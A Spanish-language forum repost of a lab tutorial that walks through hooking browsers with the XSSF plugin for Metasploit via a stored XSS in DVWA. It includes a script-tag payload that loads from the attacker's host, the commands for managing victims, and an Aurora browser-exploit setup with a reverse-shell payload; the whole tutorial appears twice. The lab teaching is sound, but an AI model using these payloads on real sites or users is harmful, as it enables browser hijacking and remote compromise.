LUK
17-02-2011, 14:10
En el siguiente post, vamos a utilizar el framework XSSF con Metasploit, que nos permitirá atacar a una víctima con un simple XSS.
XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “administrar” víctimas de XSS genéricos y realizar posteriores ataques, así como mantener el enlace para futuros ataques. Podemos encontrar una descripción más detallada del framework aquí (http://www.metasploit.com/redmine/issues/2995).
Jugando con XSSF
Para realizar estas pruebas vamos a utilizar el DVWA (http://www.dvwa.co.uk/), un framework para testing de vulnerabilidades web, instalado sobre una VM Windows XP y nuestro Backtrack 4 R2.
Lo primero que vamos a hacer es descargar el XSSF framework desde aquí (http://www.metasploit.com/redmine/attachments/596/XSSF.zip) y descomprimirlo en nuestro directorio de metasploit, luego iniciamos el framework:
# Instalamos XSSF en Metasploit
cd /opt/metasploit/msf3
wget http://www.metasploit.com/redmine/attachments
/596/XSSF.zip
unzip XSSF.zip
cd XSSF
cp -r data/ lib/ modules/ plugins/ ../
# Iniciamos Metasploit y cargamos el XSSF
msfconsole
load XSSF
http://2.bp.blogspot.com/-2jDnb4Be-20/TVvmKTw4SbI/AAAAAAAAFkg/xOqa3YJ2Dv8/s400/XSSF_loading.png (http://2.bp.blogspot.com/-2jDnb4Be-20/TVvmKTw4SbI/AAAAAAAAFkg/xOqa3YJ2Dv8/s1600/XSSF_loading.png)
Ahora vamos a DVWA, a la pestaña XSS stored, con el DVWA Security en “Low” e insertamos el siguiente XSS:
<script src=”http://IP_BACKTRACK:8888/loop?interval=5”></script>
http://4.bp.blogspot.com/-nmBh8llTL10/TVvmrUH0MjI/AAAAAAAAFkk/CipMNje9K1A/s400/XSS_DVWA.png (http://4.bp.blogspot.com/-nmBh8llTL10/TVvmrUH0MjI/AAAAAAAAFkk/CipMNje9K1A/s1600/XSS_DVWA.png)
Si todo funcionó bien, deberá quedar registrado nuestro nombre y el comentario en blanco.
Ahora, desde nuestra VM Windows XP, ingresamos a DVWA, ponemos el DVWA Security en “Low” y vamos a la pestaña XSS stored. Al momento de ingresar nuestro XSS entrará en acción ;)
Regresamos a nuestra consola de metasploit y vemos las víctimas que tenemos disponibles con el comando "xssf_victims":
http://4.bp.blogspot.com/-Zv5DH9CzWtI/TVvnNCCE0hI/AAAAAAAAFko/mV3ChugSntc/s400/XSSF_victims.png (http://4.bp.blogspot.com/-Zv5DH9CzWtI/TVvnNCCE0hI/AAAAAAAAFko/mV3ChugSntc/s1600/XSSF_victims.png)
Si queremos obtener más información acerca de alguna víctima, ingresamos el siguiente comando "xssf_information victimID":
http://4.bp.blogspot.com/-NnZhOhuXJyI/TVvnfJ4-JgI/AAAAAAAAFks/bmvlBBfkYXM/s400/XSSF_INFO.png (http://4.bp.blogspot.com/-NnZhOhuXJyI/TVvnfJ4-JgI/AAAAAAAAFks/bmvlBBfkYXM/s1600/XSSF_INFO.png)
Ahora ya podremos hacer varias cosas con la víctima, por ejemplo enviarle un popup:
use auxiliary/xssf/alert
set VictimIDs 2
set AlertMessage "Game Over"
http://1.bp.blogspot.com/-dM00HGOS-6c/TVvnwvKF8eI/AAAAAAAAFkw/B3RPQ8RvjpY/s400/XSSF_popup.png (http://1.bp.blogspot.com/-dM00HGOS-6c/TVvnwvKF8eI/AAAAAAAAFkw/B3RPQ8RvjpY/s1600/XSSF_popup.png)
También podremos lanzar un exploit contra el navegador para obtener una shell en el sistema:
use exploit/windows/browser/ms10_002_aurora
set SRVPORT 80
set PAYLOAD windows/shell/reverse_tcp
set LHOST IP_BACKTRACK
set URIPATH dvwa/vulnerabilities/xss_s/
Vemos que job nos creo, el id de la victima y luego lanzamos el exploit desde el XSSF:
jobsxssf_active_victimsxssf_exploit victimID jobID
http://3.bp.blogspot.com/-9d_GlemsUtM/TVvoL5HoEwI/AAAAAAAAFk4/wf96tG5Sc9I/s400/XSSF_aurora.png (http://3.bp.blogspot.com/-9d_GlemsUtM/TVvoL5HoEwI/AAAAAAAAFk4/wf96tG5Sc9I/s1600/XSSF_aurora.png)
Espero que les haya gustado mi primer post! :)
Referencias:
- http://www.metasploit.com/redmine/issues/2995 (http://www.metasploit.com/redmine/issues/2995)
- http://www.dvwa.co.uk/ (http://www.dvwa.co.uk/)
Publicado por Lucas Duarte Wulfert en www.KUNGFOOSION.com (http://www.kungfoosion.com/)
XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “administrar” víctimas de XSS genéricos y realizar posteriores ataques, así como mantener el enlace para futuros ataques. Podemos encontrar una descripción más detallada del framework aquí (http://www.metasploit.com/redmine/issues/2995).
Jugando con XSSF
Para realizar estas pruebas vamos a utilizar el DVWA (http://www.dvwa.co.uk/), un framework para testing de vulnerabilidades web, instalado sobre una VM Windows XP y nuestro Backtrack 4 R2.
Lo primero que vamos a hacer es descargar el XSSF framework desde aquí (http://www.metasploit.com/redmine/attachments/596/XSSF.zip) y descomprimirlo en nuestro directorio de metasploit, luego iniciamos el framework:
# Instalamos XSSF en Metasploit
cd /opt/metasploit/msf3
wget http://www.metasploit.com/redmine/attachments
/596/XSSF.zip
unzip XSSF.zip
cd XSSF
cp -r data/ lib/ modules/ plugins/ ../
# Iniciamos Metasploit y cargamos el XSSF
msfconsole
load XSSF
http://2.bp.blogspot.com/-2jDnb4Be-20/TVvmKTw4SbI/AAAAAAAAFkg/xOqa3YJ2Dv8/s400/XSSF_loading.png (http://2.bp.blogspot.com/-2jDnb4Be-20/TVvmKTw4SbI/AAAAAAAAFkg/xOqa3YJ2Dv8/s1600/XSSF_loading.png)
Ahora vamos a DVWA, a la pestaña XSS stored, con el DVWA Security en “Low” e insertamos el siguiente XSS:
<script src=”http://IP_BACKTRACK:8888/loop?interval=5”></script>
http://4.bp.blogspot.com/-nmBh8llTL10/TVvmrUH0MjI/AAAAAAAAFkk/CipMNje9K1A/s400/XSS_DVWA.png (http://4.bp.blogspot.com/-nmBh8llTL10/TVvmrUH0MjI/AAAAAAAAFkk/CipMNje9K1A/s1600/XSS_DVWA.png)
Si todo funcionó bien, deberá quedar registrado nuestro nombre y el comentario en blanco.
Ahora, desde nuestra VM Windows XP, ingresamos a DVWA, ponemos el DVWA Security en “Low” y vamos a la pestaña XSS stored. Al momento de ingresar nuestro XSS entrará en acción ;)
Regresamos a nuestra consola de metasploit y vemos las víctimas que tenemos disponibles con el comando "xssf_victims":
http://4.bp.blogspot.com/-Zv5DH9CzWtI/TVvnNCCE0hI/AAAAAAAAFko/mV3ChugSntc/s400/XSSF_victims.png (http://4.bp.blogspot.com/-Zv5DH9CzWtI/TVvnNCCE0hI/AAAAAAAAFko/mV3ChugSntc/s1600/XSSF_victims.png)
Si queremos obtener más información acerca de alguna víctima, ingresamos el siguiente comando "xssf_information victimID":
http://4.bp.blogspot.com/-NnZhOhuXJyI/TVvnfJ4-JgI/AAAAAAAAFks/bmvlBBfkYXM/s400/XSSF_INFO.png (http://4.bp.blogspot.com/-NnZhOhuXJyI/TVvnfJ4-JgI/AAAAAAAAFks/bmvlBBfkYXM/s1600/XSSF_INFO.png)
Ahora ya podremos hacer varias cosas con la víctima, por ejemplo enviarle un popup:
use auxiliary/xssf/alert
set VictimIDs 2
set AlertMessage "Game Over"
http://1.bp.blogspot.com/-dM00HGOS-6c/TVvnwvKF8eI/AAAAAAAAFkw/B3RPQ8RvjpY/s400/XSSF_popup.png (http://1.bp.blogspot.com/-dM00HGOS-6c/TVvnwvKF8eI/AAAAAAAAFkw/B3RPQ8RvjpY/s1600/XSSF_popup.png)
También podremos lanzar un exploit contra el navegador para obtener una shell en el sistema:
use exploit/windows/browser/ms10_002_aurora
set SRVPORT 80
set PAYLOAD windows/shell/reverse_tcp
set LHOST IP_BACKTRACK
set URIPATH dvwa/vulnerabilities/xss_s/
Vemos que job nos creo, el id de la victima y luego lanzamos el exploit desde el XSSF:
jobsxssf_active_victimsxssf_exploit victimID jobID
http://3.bp.blogspot.com/-9d_GlemsUtM/TVvoL5HoEwI/AAAAAAAAFk4/wf96tG5Sc9I/s400/XSSF_aurora.png (http://3.bp.blogspot.com/-9d_GlemsUtM/TVvoL5HoEwI/AAAAAAAAFk4/wf96tG5Sc9I/s1600/XSSF_aurora.png)
Espero que les haya gustado mi primer post! :)
Referencias:
- http://www.metasploit.com/redmine/issues/2995 (http://www.metasploit.com/redmine/issues/2995)
- http://www.dvwa.co.uk/ (http://www.dvwa.co.uk/)
Publicado por Lucas Duarte Wulfert en www.KUNGFOOSION.com (http://www.kungfoosion.com/)